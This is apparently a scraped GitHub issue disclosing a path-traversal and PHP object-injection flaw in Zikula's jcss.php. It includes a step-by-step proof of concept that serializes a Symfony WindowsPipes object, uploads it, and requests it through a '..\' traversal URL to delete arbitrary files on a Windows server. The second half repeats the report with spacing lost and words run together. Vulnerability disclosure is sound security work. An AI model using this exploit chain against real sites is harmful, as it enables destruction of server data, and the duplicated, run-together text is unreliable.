$f = (isset($_GET['f']) ? filter_var($_GET['f'], FILTER_SANITIZE_STRING) : false);
if (!$f) {
header('HTTP/1.0 404 Not Found');
exit;
}
// clean $f
$f = preg_replace('`/`', '', $f);
// set full path to the file
$f = $ZConfig['System']['temp'] . '/Theme_cache/' . $f;
if (!is_readable($f)) {
header('HTTP/1.0 400 Bad request');
die('ERROR: Requested file not readable.');
}
// child lock
$signingKey = md5(serialize($ZConfig['DBInfo']['databases']['default']));
$contents = file_get_contents($f);
if (!DataUtil::is_serialized($contents, false)) {
header('HTTP/1.0 500 Internal error');
die('ERROR: Corrupted file.');
}
$dataArray = unserialize($contents);
On windows platform we can bypass regex filter with ..\
PoC: http://localhost/zikula4/jcss.php?f=..\..\..\..\..\jcss.php
the result of file_get_contents() was brought into unserialize(), when unserialize() is used on user supplied data it often leads to PHP Object Injection.
here we can launch further attacks with __destruct() in ./vendor/symfony/symfony/src/Symfony/Component/Process/Pipes/WindowsPipes.php.
PoC: delete files on windows server.
Add a public func in class WindowsPipes:
public function setattr(){
$this->files = array('D:\phpStudy\WWW\zikula4\userdata\delete.txt'); // file U wants to delete
$this->fileHandles = array();
}
Serialize an WindowsPipes object and write it to file:
$obj = new WindowsPipes(true,null);
$obj->setattr();
file_put_contents('./exp.txt',serialize($obj));
Upload exp.txt to ./userdata folder on windows server.
Then request http://localhost/zikula4/jcss.php?f=..\..\..\..\..\userdata\exp.txt, and your target file will be deleted. (D:\phpStudy\WWW\zikula4\userdata\delete.txt in my test).
The text was updated successfully, but these errors were encountered:
relative codes in
./jcss.php:On windows platform we can bypass regex filter with
..\PoC:
http://localhost/zikula4/jcss.php?f=..\..\..\..\..\jcss.phpthe result of
file_get_contents()was brought intounserialize(), when unserialize() is used on user supplied data it often leads to PHP Object Injection.here we can launch further attacks with
__destruct()in./vendor/symfony/symfony/src/Symfony/Component/Process/Pipes/WindowsPipes.php.PoC: delete files on windows server.
Add a public func in class WindowsPipes:
Serialize an WindowsPipes object and write it to file:
exp.txt
Upload
exp.txtto./userdatafolder on windows server.Then request
http://localhost/zikula4/jcss.php?f=..\..\..\..\..\userdata\exp.txt, and your target file will be deleted. (D:\phpStudy\WWW\zikula4\userdata\delete.txtin my test).The text was updated successfully, but these errors were encountered: